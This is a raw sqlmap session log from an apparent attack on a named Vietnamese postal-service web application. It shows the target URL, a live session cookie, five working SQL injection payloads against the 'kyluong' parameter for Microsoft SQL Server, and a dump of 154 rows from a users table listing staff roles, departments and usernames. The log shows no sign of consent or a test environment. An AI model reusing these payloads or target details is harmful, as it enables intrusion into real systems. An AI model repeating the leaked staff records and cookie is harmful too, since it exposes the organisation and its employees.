        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.11.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:04:50 /2025-11-17/

[1/1] URL:
GET http://vps.vnpost.vn/chamcong/report/rpt_BCC.aspx?kyluong=112025&MA_DV=KVMB&TEN_DV=Kho%20v%E1%BA%ADn%20mi%E1%BB%81n%20b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC%20Khai%20th%C3%A1c%20TC&MA_TO=VP&TEN_TO=V%C4%83n%20ph%C3%B2ng
Cookie: ASP.NET_SessionId=lswqd4itz5u4ftzm3jcmjfio
do you want to test this URL? [Y/n/q]
> Y
[19:04:51] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kyluong (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: kyluong=112025' AND 2784=(SELECT (CASE WHEN (2784=2784) THEN 2784 ELSE (SELECT 7134 UNION SELECT 5563) END))-- gZAK&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: kyluong=112025' AND 4111 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4111=4111) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(120)+CHAR(113))) AND 'mddd'='mddd&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: kyluong=112025';WAITFOR DELAY '0:0:5'--&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: kyluong=112025' WAITFOR DELAY '0:0:5'--&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: kyluong=112025' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(83)+CHAR(73)+CHAR(120)+CHAR(99)+CHAR(75)+CHAR(114)+CHAR(82)+CHAR(104)+CHAR(102)+CHAR(72)+CHAR(83)+CHAR(98)+CHAR(106)+CHAR(81)+CHAR(102)+CHAR(74)+CHAR(72)+CHAR(83)+CHAR(98)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(69)+CHAR(67)+CHAR(81)+CHAR(82)+CHAR(82)+CHAR(122)+CHAR(100)+CHAR(104)+CHAR(78)+CHAR(81)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(111)+CHAR(104)+CHAR(68)+CHAR(110)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(120)+CHAR(113)-- kFjk&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng
---
do you want to exploit this SQL injection? [Y/n] Y
web server operating system: Windows 2019 or 2022 or 10 or 2016 or 11
web application technology: Microsoft IIS 10.0, ASP.NET, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2017
Database: NSTL
Table: V_TT_USERS
[154 entries]
+------------+------------------------+--------------------+------------------------+------------------+--------------------+-----------------+
| MA_BP      | MA_DV                  | HO_TEN             | TEN_BP                 | TEN_DV           | TEN_TO             | USERNAME        |
+------------+------------------------+--------------------+------------------------+------------------+--------------------+-----------------+
| CNCTY      | Khối chức năng CTY     | Chuc Nang TCY      | CNCTY \xa0\xa0\xa0\xa0 | <blank>          | <blank>            | <blank>         |
| TV         | KVMB                   | CMNV               | Thử việc               | Kho vận miền bắc | CMNV               | KVMBTVCMNV      |
| NULL       | CNCTY                  | CV tiền lương      | Khối chức năng CTY     | TLCNCTY \xa0\xa0 | TLCNCTY            | <blank>         |
| NULL       | CNCTY                  | CV tiền lương      | Khối chức năng CTY     | TLCNCTY \xa0\xa0 | TLCNCTY            | <blank>         |
| NULL       | CNCTY                  | CV tiền lương      | Khối chức năng CTY     | TLCNCTY \xa0\xa0 | TLCNCTY            | <blank>         |
| NULL       | CNCTY                  | CV tiền lương      | Khối chức năng CTY     | TLCNCTY \xa0\xa0 | TLCNCTY            | <blank>         |
| NULL       | CNCTY                  | CV tiền lương      | Khối chức năng CTY     | TLCNCTY \xa0\xa0 | TLCNCTY            | <blank>         |
| NV         | KVMB                   | Điều h\xe0nh       | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVDH \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Điều h\xe0nh       | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVDH \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Điều h\xe0nh       | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVDH \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Điều h\xe0nh       | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVDH \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Điều h\xe0nh       | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVDH \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Điều h\xe0nh       | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVDH \xa0      | P.Nghiệp vụ\r\n |
| LD         | KVMB                   | Gi\xe1m đốc        | Ban Gi\xe1m đốc        | Kho vận miền bắc | KVMBLDGD \xa0      | KVMBLDGD        |
| LD         | KVMB                   | Gi\xe1m đốc        | Ban Gi\xe1m đốc        | Kho vận miền bắc | KVMBLDGD \xa0      | KVMBLDGD        |
| LD         | KVMB                   | Gi\xe1m đốc        | Ban Gi\xe1m đốc        | Kho vận miền bắc | KVMBLDGD \xa0      | KVMBLDGD        |
| LD         | KVMB                   | Gi\xe1m đốc        | Ban Gi\xe1m đốc        | Kho vận miền bắc | KVMBLDGD \xa0      | KVMBLDGD        |
| LD         | KVMB                   | Gi\xe1m đốc        | Ban Gi\xe1m đốc        | Kho vận miền bắc | KVMBLDGD \xa0      | KVMBLDGD        |
| NULL       | QTMB                   | Giao nhận          | TT QT miền bắc         | QTMBVCGN \xa0    | QTMBVCGN           | <blank>         |
| NULL       | QTMB                   | Giao nhận          | TT QT miền bắc         | QTMBVCGN \xa0    | QTMBVCGN           | <blank>         |
| NULL       | QTMB                   | Giao nhận          | TT QT miền bắc         | QTMBVCGN \xa0    | QTMBVCGN           | <blank>         |
| NULL       | QTMB                   | Giao nhận          | TT QT miền bắc         | QTMBVCGN \xa0    | QTMBVCGN           | <blank>         |
| NULL       | QTMB                   | Giao nhận          | TT QT miền bắc         | QTMBVCGN \xa0    | QTMBVCGN           | <blank>         |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| VC1        | KVMB                   | Hộ Tống Vi\xean    | ĐỘI VẬN CHUYỂN 1       | Kho vận miền bắc | HỘ TỐNG VI\xcaN    | KVMBVC1HTV \xa0 |
| TH         | KVMB                   | Kế to\xe1n         | P.Tổng hợp             | Kho vận miền bắc | KVMBTHKT \xa0      | KVMBTHKT        |
| TH         | KVMB                   | Kế to\xe1n         | P.Tổng hợp             | Kho vận miền bắc | KVMBTHKT \xa0      | KVMBTHKT        |
| TH         | KVMB                   | Kế to\xe1n         | P.Tổng hợp             | Kho vận miền bắc | KVMBTHKT \xa0      | KVMBTHKT        |
| TH         | KVMB                   | Kế to\xe1n         | P.Tổng hợp             | Kho vận miền bắc | KVMBTHKT \xa0      | KVMBTHKT        |
| TH         | KVMB                   | Kế to\xe1n         | P.Tổng hợp             | Kho vận miền bắc | KVMBTHKT \xa0      | KVMBTHKT        |
| NULL       | QTMB                   | Khai th\xe1c       | TT QT miền bắc         | QTMBLTKT \xa0    | QTMBLTKT           | <blank>         |
| NULL       | QTMB                   | Khai th\xe1c       | TT QT miền bắc         | QTMBLTKT \xa0    | QTMBLTKT           | <blank>         |
| NULL       | QTMB                   | Khai th\xe1c       | TT QT miền bắc         | QTMBLTKT \xa0    | QTMBLTKT           | <blank>         |
| NULL       | QTMB                   | Khai th\xe1c       | TT QT miền bắc         | QTMBLTKT \xa0    | QTMBLTKT           | <blank>         |
| NULL       | QTMB                   | Khai th\xe1c       | TT QT miền bắc         | QTMBLTKT \xa0    | QTMBLTKT           | <blank>         |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | KSV                | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVKS \xa0      | P.Nghiệp vụ\r\n |
| NULL       | QTMB                   | L\xe1i xe          | TT QT miền bắc         | QTMBVCLX \xa0    | QTMBVCLX           | <blank>         |
| NULL       | QTMB                   | L\xe1i xe          | TT QT miền bắc         | QTMBVCLX \xa0    | QTMBVCLX           | <blank>         |
| NULL       | QTMB                   | L\xe1i xe          | TT QT miền bắc         | QTMBVCLX \xa0    | QTMBVCLX           | <blank>         |
| NULL       | QTMB                   | L\xe1i xe          | TT QT miền bắc         | QTMBVCLX \xa0    | QTMBVCLX           | <blank>         |
| NULL       | QTMB                   | L\xe1i xe          | TT QT miền bắc         | QTMBVCLX \xa0    | QTMBVCLX           | <blank>         |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Nghiệp vụ          | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVNV \xa0      | P.Nghiệp vụ\r\n |
| LD         | KVMB                   | Ph\xf3 Gi\xe1m đốc | Ban Gi\xe1m đốc        | Kho vận miền bắc | Ph\xf3 Gi\xe1m đốc | KVMBLDPGD       |
| LD         | KVMB                   | Ph\xf3 Gi\xe1m đốc | Ban Gi\xe1m đốc        | Kho vận miền bắc | Ph\xf3 Gi\xe1m đốc | KVMBLDPGD       |
| LD         | KVMB                   | Ph\xf3 Gi\xe1m đốc | Ban Gi\xe1m đốc        | Kho vận miền bắc | Ph\xf3 Gi\xe1m đốc | KVMBLDPGD       |
| LD         | KVMB                   | Ph\xf3 Gi\xe1m đốc | Ban Gi\xe1m đốc        | Kho vận miền bắc | Ph\xf3 Gi\xe1m đốc | KVMBLDPGD       |
| LD         | KVMB                   | Ph\xf3 Gi\xe1m đốc | Ban Gi\xe1m đốc        | Kho vận miền bắc | Ph\xf3 Gi\xe1m đốc | KVMBLDPGD       |
| LD         | KVMB                   | PTKT               | Ban Gi\xe1m đốc        | Kho vận miền bắc | PTKT               | KVMBLDPTKT      |
| LD         | KVMB                   | PTKT               | Ban Gi\xe1m đốc        | Kho vận miền bắc | PTKT               | KVMBLDPTKT      |
| LD         | KVMB                   | PTKT               | Ban Gi\xe1m đốc        | Kho vận miền bắc | PTKT               | KVMBLDPTKT      |
| LD         | KVMB                   | PTKT               | Ban Gi\xe1m đốc        | Kho vận miền bắc | PTKT               | KVMBLDPTKT      |
| LD         | KVMB                   | PTKT               | Ban Gi\xe1m đốc        | Kho vận miền bắc | PTKT               | KVMBLDPTKT      |
| NULL       | Admin \xa0\xa0\xa0\xa0 | Quản trị           | Admin                  | <blank>          | <blank>            | <blank>         |
| NULL       | Admin \xa0\xa0\xa0\xa0 | Quản trị           | Admin                  | <blank>          | <blank>            | <blank>         |
| NULL       | Admin \xa0\xa0\xa0\xa0 | Quản trị           | Admin                  | <blank>          | <blank>            | <blank>         |
| NULL       | Admin \xa0\xa0\xa0\xa0 | Quản trị           | Admin                  | <blank>          | <blank>            | <blank>         |
| NULL       | Admin \xa0\xa0\xa0\xa0 | Quản trị           | Admin                  | <blank>          | <blank>            | <blank>         |
| NV         | KVMB                   | Sủa chữa           | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVSC \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Sủa chữa           | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVSC \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Thống k\xea        | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVTK \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Thống k\xea        | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVTK \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Thống k\xea        | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVTK \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Thống k\xea        | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVTK \xa0      | P.Nghiệp vụ\r\n |
| NV         | KVMB                   | Thống k\xea        | P.Nghiệp vụ\n          | Kho vận miền bắc | KVMBNVTK \xa0      | P.Nghiệp vụ\r\n |
| TH         | KVMB                   | Tổ chức            | P.Tổng hợp             | Kho vận miền bắc | KVMBTHTC \xa0      | KVMBTHTC        |
| TH         | KVMB                   | Tổ chức            | P.Tổng hợp             | Kho vận miền bắc | KVMBTHTC \xa0      | KVMBTHTC        |
| TH         | KVMB                   | Tổ chức            | P.Tổng hợp             | Kho vận miền bắc | KVMBTHTC \xa0      | KVMBTHTC        |
| TH         | KVMB                   | Tổ chức            | P.Tổng hợp             | Kho vận miền bắc | KVMBTHTC \xa0      | KVMBTHTC        |
| TH         | KVMB                   | Tổ chức            | P.Tổng hợp             | Kho vận miền bắc | KVMBTHTC \xa0      | KVMBTHTC        |
| NULL       | QTMB                   | Vận chuyển         | TT QT miền bắc         | QTMBVCVC \xa0    | QTMBVCVC           | <blank>         |
| NULL       | QTMB                   | Vận chuyển         | TT QT miền bắc         | QTMBVCVC \xa0    | QTMBVCVC           | <blank>         |
| NULL       | QTMB                   | Vận chuyển         | TT QT miền bắc         | QTMBVCVC \xa0    | QTMBVCVC           | <blank>         |
| NULL       | QTMB                   | Vận chuyển         | TT QT miền bắc         | QTMBVCVC \xa0    | QTMBVCVC           | <blank>         |
| NULL       | QTMB                   | Vận chuyển         | TT QT miền bắc         | QTMBVCVC \xa0    | QTMBVCVC           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NULL       | QTMB                   | Văn ph\xf2ng       | TT QT miền bắc         | QTMBLTVP \xa0    | QTMBLTVP           | <blank>         |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
| NV         | KVMB                   | \xd0i?u h\xe0nh    | P.Nghi?p v?\n          | Kho v?n mi?n b?c | KVMBNVDH \xa0      | P.Nghi?p v?\r\n |
+------------+------------------------+--------------------+------------------------+------------------+--------------------+-----------------+


[*] ending @ 19:05:40 /2025-11-17/

